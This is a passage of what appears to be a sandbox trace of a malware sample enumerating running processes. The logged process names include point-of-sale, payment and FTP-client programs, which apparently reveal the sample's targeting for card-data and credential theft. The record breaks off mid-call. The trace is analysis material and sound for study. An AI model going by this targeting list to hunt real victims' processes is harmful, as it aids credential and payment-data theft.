th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0171.732] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0171.733] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0171.736] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0171.739] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0171.744] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0171.746] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0171.748] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0171.750] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0171.752] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0171.754] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0171.756] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0171.758] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0171.760] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0171.767] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0171.770] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.772] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0171.773] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.775] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.777] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0171.779] CloseHandle (hObject=0x1a84) returned 1 [0171.779] Sleep (dwMilliseconds=0x64) [0171.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ce4 [0171.917] Process32First (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.920] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.922] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.938] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.943] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.949] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.952] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.954] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.955] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.003] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.005] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.008] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.010] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.012] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.014] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.017] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.020] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.022] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.024] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.026] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.028] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0172.030] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.033] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0172.035] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.037] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0172.076] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0172.079] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0172.081] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0172.084] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0172.086] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0172.088] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.090] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.093] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0172.096] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0172.098] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.100] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.103] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.105] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.107] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0172.110] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0172.112] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0172.118] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0172.120] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0172.122] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0172.125] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0172.127] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0172.129] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0172.131] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0172.146] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0172.148] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0172.150] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0172.153] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0172.156] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0172.158] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0172.160] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0172.161] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0172.172] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0172.177] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0172.179] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0172.181] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0172.184] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0172.187] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0172.189] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0172.192] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0172.209] Process32Next (in: hSnapshot=0x1ce4, 